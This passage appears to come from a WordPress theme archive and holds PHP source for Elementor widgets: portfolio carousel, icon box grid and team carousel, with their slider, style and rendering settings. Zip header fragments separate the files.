		return 'ipcarousel';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Portfolio Carousel', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-slider-push';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Projects', 'maxbizz' ),
			]
		);
		$this->add_control(
			'project_cat',
			[
				'label' => __( 'Select Categories', 'maxbizz' ),
				'type' => Controls_Manager::SELECT2,
				'options' => $this->select_param_cate_project(),
				'multiple' => true,
				'label_block' => true,
				'placeholder' => __( 'All Categories', 'maxbizz' ),
			]
		);
		$this->add_control(
			'project_num',
			[
				'label' => __( 'Show Number Projects', 'maxbizz' ),
				'type' => Controls_Manager::NUMBER,
				'default' => '5',
			]
		);	
		$this->add_control(
			'heading_slider',
			[
				'label' => __( 'Slider', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$slides_show = range( 1, 6 );
		$slides_show = array_combine( $slides_show, $slides_show );

		$this->add_responsive_control(
			'tshow',
			[
				'label' => __( 'Slides to Show', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'' => __( 'Default', 'maxbizz' ),
				] + $slides_show,
				'default' => ''
			]
		);
		$this->add_control(
			'center_mode',
			[
				'label' => __( 'Center Mode', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'loop',
			[
				'label' => __( 'Loop', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'autoplay',
			[
				'label' => __( 'Autoplay', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'timeout',
			[
				'label' => __( 'Autoplay Timeout', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 1000,
						'max'  => 20000,
						'step' => 1000,
					],
				],
				'default' => [
					'size' => 7000,
				],
				'condition' => [
					'autoplay' => 'true',
				]
			]
		);
		$this->add_control(
			'arrows',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_control(
			'dots',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_responsive_control(
			'w_gaps',
			[
				'label' => __( 'Gap Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
			]
		);
		$this->end_controls_section();

		$this->start_controls_section(
			'overlay_style_section',
			[
				'label' => __( 'Project Items', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'heading_general',
			[
				'label' => __( 'General', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'overlay_align',
			[
				'label' => __( 'Alignment Info', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],				
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info .portfolio-info-inner' => 'text-align: {{VALUE}};',
				],
			]
		);
		$this->add_responsive_control(
			'info_padding',
			[
				'label' => 'Padding Info',
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .portfolio-info' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_thumb',
			[
				'label' => __( 'Border Radius Image', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .projects-box' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'scale_thumb',
			[
				'label' => __( 'Animation Image Hover', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Yes', 'maxbizz' ),
				'label_off' => __( 'No', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
			]
		);

		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info h5' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info h5 a' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_hcolor',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info h5 a:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .projects-box .portfolio-info h5 a',
			]
		);

		/* category */
		$this->add_control(
			'heading_overlay',
			[
				'label' => __( 'Category', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'show_cat',
			[
				'label' => __( 'Show Category', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'maxbizz' ),
				'label_off' => __( 'Hide', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
			]
		);
		$this->add_control(
			'cat_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info .portfolio-cates a' => 'color: {{VALUE}}; background-image: linear-gradient(0deg, {{VALUE}}, {{VALUE}});',
					'{{WRAPPER}} .projects-box .portfolio-info .portfolio-cates'   => 'color: {{VALUE}};',
				],
				'condition' => [
					'show_cat' => 'yes',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'cat_typography',
				'selector' => '{{WRAPPER}} .projects-box .portfolio-info .portfolio-cates a, {{WRAPPER}} .projects-box .portfolio-info .portfolio-cates span',
				'condition' => [
					'show_cat' => 'yes',
				]
			]
		);
		$this->end_controls_section();	

		// Dots.
		$this->start_controls_section(
			'navigation_section',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'dots' => 'true',
				],
			]
		);

		$this->add_responsive_control(
			'dots_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-dots' => 'bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
            'dots_bgcolor',
            [
                'label' => __( 'Color', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->add_control(
            'dots_active_bgcolor',
            [
                'label' => __( 'Color Active', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot.active span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->end_controls_section();

        // Arrow.
		$this->start_controls_section(
			'style_nav',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'arrows' => 'true',
				],
			]
		);
		$this->add_control(
			'arrow_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_hcolor',
			[
				'label' => __( 'Color Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_color',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_hcolor',
			[
				'label' => __( 'Background Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'radius_arrow',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'border-radius: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>
		<div class="project-slider <?php if( $settings['scale_thumb'] ) echo ' img-scale'; if( !$settings['show_cat'] ) echo ' no-cat'; ?>" data-loop="<?php echo $settings['loop']; ?>" data-auto="<?php echo $settings['autoplay']; ?>" data-time="<?php echo $settings['timeout']['size']; ?>" data-center="<?php echo $settings['center_mode']; ?>" data-arrows="<?php echo $settings['arrows']; ?>" data-dots="<?php echo $settings['dots']; ?>" data-show="<?php echo $settings['tshow']; ?>" data-tshow="<?php echo esc_attr( $settings['tshow_tablet'] ); ?>" data-mshow="<?php echo esc_attr( $settings['tshow_mobile'] ); ?>" data-gaps="<?php echo esc_attr( $settings['w_gaps']['size'] ); ?>" data-tgaps="<?php echo esc_attr( $settings['w_gaps_tablet']['size'] ); ?>" data-mgaps="<?php echo $settings['w_gaps_mobile']['size']; ?>">
			<div class="owl-carousel owl-theme">
				<?php 
					if( $settings['project_cat'] ){
		                $args = array(	                    
		                    'post_type' => 'ot_portfolio',
		                    'post_status' => 'publish',
		                    'posts_per_page' => $settings['project_num'],
		                    'tax_query' => array(
		                        array(
		                            'taxonomy' => 'portfolio_cat',
		                            'field' => 'slug',
		                            'terms' => $settings['project_cat'],
		                        ),
		                    ),              
		                );
		            }else{
		                $args = array(
		                    'post_type' => 'ot_portfolio',
		                    'post_status' => 'publish',
		                    'posts_per_page' => $settings['project_num'],
		                );
		            }			
					$wp_query = new \WP_Query($args);					
					while ($wp_query -> have_posts()) : $wp_query -> the_post(); 

					get_template_part( 'template-parts/content', 'project-carousel' );

					endwhile; wp_reset_postdata(); 
				?>
			</div>
	    </div>
	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'slider', 'carousel', 'project' ];
	}

	protected function select_param_cate_project() {
	  	$category = get_terms( 'portfolio_cat' );
	  	$cat = array();
	  	foreach( $category as $item ) {
	     	if( $item ) {
	        	$cat[$item->slug] = $item->name;
	     	}
	  	}
	  	return $cat;
	}
}
// After the Maxbizz_Portfolio_Slider class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Portfolio_Slider() );PK�8FZ����r/r//inc/backend/elementor/widgets/icon-box-grid.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Icon Box Grid
 */
class Maxbizz_IconBox_Grid extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iiconbox_grid';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Icon Box Grid', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-gallery-grid';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Service box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Icon Boxes', 'maxbizz' ),
			]
		);

		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				// 'prefix_class' => 'maxbizz%s-align-',
				'selectors' => [
					'{{WRAPPER}}' => 'text-align: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'column_grid',
			[
				'label' => __( 'Columns', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'col-md-4',
				'options' => [
					'col-md-12' => __( '1', 'maxbizz' ),
					'col-md-6'  => __( '2', 'maxbizz' ),
					'col-md-4'  => __( '3', 'maxbizz' ),
					'col-md-3'  => __( '4', 'maxbizz' ),
				]
			]
		);

		$repeater = new Repeater();

		
		$repeater->add_control(
			'icon_font',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'type' => Controls_Manager::ICONS,
				'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fas fa-star',
					'library' => 'fa-solid',
				],
			]
		);

		$repeater->add_control(
			'title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'label_block' => true,
				'default' => esc_html__( 'Content Marketing', 'maxbizz' ),
			]
		);

		$repeater->add_control(
			'des',
			[
				'label' => 'Description',
				'type' => Controls_Manager::TEXTAREA,
				'default' => esc_html__( 'You can provide the answers that your potential customers are trying to find, so you can become the industry.', 'maxbizz' ),
			]
		);

		$repeater->add_control(
			'link',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
			]
		);

		$this->add_control(
		    'icon_boxes',
		    [
		        'label'       => '',
		        'type'        => Controls_Manager::REPEATER,
		        'show_label'  => false,
		        'default'     => [
		            [
		            	'icon_font' => __( 'fas fa-star', 'maxbizz' ),
		             	'title' => esc_html__( 'Content Marketing', 'maxbizz' ),
		                'des'	=> esc_html__( 'You can provide the answers that your potential customers are trying to find, so you can become the industry.', 'maxbizz' ),
		             	'link' => '',
		            ],
		            [
		            	'icon_font' => __( 'fas fa-star', 'maxbizz' ),
		             	'title' => esc_html__( 'Content Marketing', 'maxbizz' ),
		                'des'	=> esc_html__( 'You can provide the answers that your potential customers are trying to find, so you can become the industry.', 'maxbizz' ),
		             	'link' => '',
		            ],
		            [
		            	'icon_font' => __( 'fas fa-star', 'maxbizz' ),
		             	'title' => esc_html__( 'Content Marketing', 'maxbizz' ),
		                'des'	=> esc_html__( 'You can provide the answers that your potential customers are trying to find, so you can become the industry.', 'maxbizz' ),
		             	'link' => '',
		            ]
		        ],
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{title}}}',
		    ]
		);
		$this->add_control(
			'header_size',
			[
				'label' => __( 'Title HTML Tag', 'elementor' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'h1' => 'H1',
					'h2' => 'H2',
					'h3' => 'H3',
					'h4' => 'H4',
					'h5' => 'H5',
					'h6' => 'H6',
					'div' => 'div',
					'span' => 'span',
					'p' => 'p',
				],
				'default' => 'h6',
			]
		);

		$this->end_controls_section();

		//Style
		$this->start_controls_section(
			'style_box_section',
			[
				'label' => __( 'Boxes', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'bg_box',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .icon-box' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'bg_hover_box',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .icon-box' => 'border-color: {{VALUE}};',
				],
			]
		);
		$this->add_responsive_control(
			'box_radius',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .icon-box-grid' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}}; overflow: hidden;',
				],
			]
		);
		$this->add_responsive_control(
			'box_padding',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .icon-box' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'heading_shadow',
			[
				'label' => __( 'Hover Box Shadow', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .icon-box:hover',
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_icon_section',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_control(
			'icon_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-main i' => 'color: {{VALUE}};',
					'{{WRAPPER}} .icon-main svg' => 'fill: {{VALUE}};',
				],
			]
		);
		$this->add_responsive_control(
			'icon_size',
			[
				'label' => __( 'Size', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-main i' => 'font-size: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .icon-main svg' => 'width: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'icon_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Title
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .title-box' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-box' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .title-box',
			]
		);

		//Description
		$this->add_control(
			'heading_des',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'des_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box p' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'des_typography',
				'selector' => '{{WRAPPER}} .icon-box p',
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();

		$this->add_render_attribute( 'heading', 'class', 'title-box' );		
		?>
		<div class="icon-box-grid">
			<?php if ( ! empty( $settings['icon_boxes'] ) ) : foreach ( $settings['icon_boxes'] as $key => $boxes ) : ?>
			<div class="<?php echo esc_attr( $settings['column_grid'] ); ?> no-padding">
				<div class="icon-box">
					<div class="icon-main">
						<?php if ( ! empty( $boxes['icon_font']['value'] ) ) { Icons_Manager::render_icon( $boxes['icon_font'], [ 'aria-hidden' => 'true' ] ); } ?>
					</div>
			        <div class="content-box">
			        	<?php 
							$title = $boxes['title'];
							$title_html = sprintf( '<%1$s %2$s>%3$s</%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $title );
							if ( ! empty( $boxes['link']['url'] ) ) {
								$this->add_render_attribute( 'iconbox'.$key, 'href', $boxes['link']['url'] );

								if ( $boxes['link']['is_external'] ) {
									$this->add_render_attribute( 'iconbox'.$key, 'target', '_blank' );
								}

								if ( $boxes['link']['nofollow'] ) {
									$this->add_render_attribute( 'iconbox'.$key, 'rel', 'nofollow' );
								}
								$title_html = sprintf( '<%1$s %2$s><a ' .$this->get_render_attribute_string( 'iconbox'.$key ). '>%3$s</a></%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $title );
							}
			        	?>
			            <?php if( ! empty( $boxes['title'] ) ) { echo $title_html; } ?>
			            <?php if( $boxes['des'] ) { echo '<p>' .$boxes['des']. '</p>'; } ?>
			        </div>
			    </div>
		    </div>
		    <?php endforeach; endif; ?>
		</div>
	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'service', 'grid' ];
	}
}
// After the Schedule class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_IconBox_Grid() );PK�8FZM$�}�U�U/inc/backend/elementor/widgets/team-carousel.phpnu�[���<?php 
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Team Carousel
 */
class Maxbizz_Team_Carousel extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iteamcarousel';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Team Carousel', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-slider-push';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		/**TAB_CONTENT**/
		$this->start_controls_section(
			'content_section',
			[
				'label' => esc_html__( 'Team', 'maxbizz' ),
			]
		);

		$repeater = new Repeater();

		$repeater->add_control(
	       'member_image',
	        [
	            'label' => esc_html__( 'Photo', 'theratio' ),
	            'type'  => Controls_Manager::MEDIA,
		    ]
		);

	    $repeater->add_control(
		    'member_name',
	      	[
	          	'label' => esc_html__( 'Name', 'theratio' ),
	          	'type'  => Controls_Manager::TEXT,
				'default' => esc_html__( 'Peter Perish', 'theratio' ),
				'label_block' => true
	    	]
	    );

	    $repeater->add_control(
		    'member_extra',
	      	[
	          	'label' => esc_html__( 'Extra/Job', 'theratio' ),
	          	'type'  => Controls_Manager::TEXTAREA,
	          	'default' => esc_html__( 'co-founder of company', 'theratio' ),
	    	]
	    );

	    $repeater->add_control(
			'link',
			[
				'label' => __( 'Link To Details', 'theratio' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://', 'theratio' ),
			]
		);

		$repeater->add_control(
			'socials',
			[
				'label' => __( 'Socials', 'theratio' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'theratio' ),
				'label_off' => __( 'Hide', 'theratio' ),
				'return_value' => 'yes',
				'default' => 'yes',
				'separator' => 'before',
			]
		);

	    $repeater->add_control(
		    'social1',
	      	[
	          	'label' => esc_html__( 'Icon Social 1', 'theratio' ),
                'type'  => Controls_Manager::ICONS,
                'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fab fa-twitter',
					'library' => 'fa-brand',
				],
				'condition' => [
					'socials' => 'yes',
				],
	    	]
	    );
	    $repeater->add_control(
			'social1_link',
			[
				'label' => __( 'Link Social 1', 'theratio' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://twitter.com/', 'theratio' ),
				'condition' => [
					'socials' => 'yes',
				],
			]
		);

		$repeater->add_control(
		    'social2',
	      	[
	          	'label' => esc_html__( 'Icon Social 2', 'theratio' ),
                'type'  => Controls_Manager::ICONS,
                'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fab fa-facebook-f',
					'library' => 'fa-brand',
				],
				'separator' => 'before',
				'condition' => [
					'socials' => 'yes',
				],
	    	]
	    );
	    $repeater->add_control(
			'social2_link',
			[
				'label' => __( 'Link Social 2', 'theratio' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://facebook.com/', 'theratio' ),
				'condition' => [
					'socials' => 'yes',
				],
			]
		);

		$repeater->add_control(
		    'social3',
	      	[
	          	'label' => esc_html__( 'Icon Social 3', 'theratio' ),
                'type'  => Controls_Manager::ICONS,
                'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fab fa-pinterest-p',
					'library' => 'fa-brand',
				],
				'separator' => 'before',
				'condition' => [
					'socials' => 'yes',
				],
	    	]
	    );
	    $repeater->add_control(
			'social3_link',
			[
				'label' => __( 'Link Social 3', 'theratio' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://pinterest.com/', 'theratio' ),
				'condition' => [
					'socials' => 'yes',
				],
			]
		);

		$this->add_control(
		    'members',
		    [
		        'label'       => esc_html__( 'Team', 'theratio' ),
		        'type'        => Controls_Manager::REPEATER,
		        'show_label'  => false,
		        'default'     => [],
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{member_name}}}',
		    ]
		);
		$this->add_group_control(
			Group_Control_Image_Size::get_type(),
			[
				'name' => 'member_image_size',
				'exclude' => ['1536x1536', '2048x2048'],
				'include' => [],
				'default' => 'full',
			]
		);

		$slides_show = range( 1, 10 );
		$slides_show = array_combine( $slides_show, $slides_show );

		$this->add_responsive_control(
			'tshow',
			[
				'label' => __( 'Slides To Show', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'' => __( 'Default', 'maxbizz' ),
				] + $slides_show,
				'default' => ''
			]
		);
		$this->add_control(
			'loop',
			[
				'label' => __( 'Loop', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'autoplay',
			[
				'label' => __( 'Autoplay', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'timeout',
			[
				'label' => __( 'Autoplay Timeout', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 1000,
						'max'  => 20000,
						'step' => 1000,
					],
				],
				'default' => [
					'size' => 7000,
				],
				'condition' => [
					'autoplay' => 'true',
				]
			]
		);
		$this->add_control(
			'arrows',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
